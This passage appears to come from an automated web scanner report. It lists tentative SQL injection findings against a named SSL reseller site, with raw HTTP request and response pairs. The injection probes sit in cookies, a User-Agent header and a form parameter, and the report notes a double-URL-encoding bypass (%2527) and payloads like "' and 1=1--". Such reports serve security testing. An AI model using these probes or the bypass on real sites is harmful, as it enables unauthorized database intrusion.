Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.1.10.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl-premium.html&ve%5Btitle%5D=QuickSSL+Premium+Certificates+from+Geotrust+as+low+as+%2496.50%2Fyear.+Cheapssls.com+-+Same
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:50:24 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=av3i5cjq840r8oducgipgvfit5; expires=Sat, 17-Sep-2011 21:50:24 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=51f1b%250d%250af904b85b4d7; expires=Sun, 02-Sep-2012 21:50:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:50:24 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html
Content-Length: 791
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1''
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.1.10.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl-premium.html&ve%5Btitle%5D=QuickSSL+Premium+Certificates+from+Geotrust+as+low+as+%2496.50%2Fyear.+Cheapssls.com+-+Same
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:50:27 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:50:26 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.9. http://www.cheapssls.com/index.php [__utmb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cheapssls.com
Path:   /index.php

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html
Content-Length: 747
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgCurrentDomain=www.cheapssls.com; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.4.7.1315085424'; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; stat_uniq_code=134386

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpremiumssl.html&ve%5Btitle%5D=PremiumSSL+Certificates.+Premium+SSLs+from+Comodo+as+low+as+%2475%2Fyear&ve%5Bbrowser_version%5D=13
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:49:38 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=pkocsogmbaf1vi4iaajpdf4716; expires=Sat, 17-Sep-2011 21:49:38 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=51f1b%250d%250af904b85b4d7; expires=Sun, 02-Sep-2012 21:49:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:49:38 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html
Content-Length: 747
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgCurrentDomain=www.cheapssls.com; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.4.7.1315085424''; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; stat_uniq_code=134386

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpremiumssl.html&ve%5Btitle%5D=PremiumSSL+Certificates.+Premium+SSLs+from+Comodo+as+low+as+%2475%2Fyear&ve%5Bbrowser_version%5D=13
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:49:42 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:49:41 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.10. http://www.cheapssls.com/index.php [stat_uniq_code cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cheapssls.com
Path:   /index.php

Issue detail

The stat_uniq_code cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the stat_uniq_code cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the stat_uniq_code cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Content-Length: 758
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386%2527; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.8.6.1315085433813; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ve%5Btitle%5D=Comodo+PositiveSSL+Certificates.+Positive+SSL+from+Comodo+as+low+as+%248.00%2Fyear&ve%5Bbrowser_ve
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:49:21 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=rbvfnqfkmjp3bd4bj763nicgg1; expires=Sat, 17-Sep-2011 21:49:21 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=134386%2527; expires=Sun, 02-Sep-2012 21:49:21 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:49:21 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Content-Length: 758
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386%2527%2527; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.8.6.1315085433813; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ve%5Btitle%5D=Comodo+PositiveSSL+Certificates.+Positive+SSL+from+Comodo+as+low+as+%248.00%2Fyear&ve%5Bbrowser_ve
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:49:25 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:49:24 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.11. https://www.cheapssls.com/index.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.cheapssls.com
Path:   /index.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 486
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1'
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.20.9.1315085555105; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowse
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 22:10:56 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=7uv22qlq49s55pskbvdl5fqoi1; expires=Sat, 17-Sep-2011 22:10:56 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=134386%27+and+1%3D1--+; expires=Sun, 02-Sep-2012 22:10:56 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 22:10:56 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 486
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1''
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.20.9.1315085555105; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowse
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 22:10:58 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 22:10:57 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.12. https://www.cheapssls.com/index.php [sgTrackerUserId cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.cheapssls.com
Path:   /index.php

Issue detail

The sgTrackerUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sgTrackerUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the sgTrackerUserId cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 486
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga%2527; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.20.9.1315085555105; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowse
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:58:29 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=s5n3ao5d0ilonagm1tiit14ai7; expires=Sat, 17-Sep-2011 21:58:29 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=134386+and+2%3D2--+; expires=Sun, 02-Sep-2012 21:58:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:58:28 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 486
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga%2527%2527; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.20.9.1315085555105; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowse
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:58:31 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:58:31 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.13. https://www.cheapssls.com/index.php [ve%5Bbrowser%5D parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.cheapssls.com
Path:   /index.php

Issue detail

The ve%5Bbrowser%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ve%5Bbrowser%5D parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ve%5Bbrowser%5D request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 486
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.20.9.1315085555105; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218&ve%5Bbrowser%5D=Chrome%2527&ve%5Bos%5D=Windows&ve%5Bclient_language%5D=en-US&ve%5Breferrer%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ve%5Bscreen_x%5D=1920&ve%5Bscreen_y%5D=1200&ve%5Bcolor%5D
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:50:27 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=m7sdcbeh2rbhf9s59luj62vj82; expires=Sat, 17-Sep-2011 21:50:27 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=51f1b%250d%250af904b85b4d7; expires=Sun, 02-Sep-2012 21:50:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:50:27 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 486
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.20.9.1315085555105; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

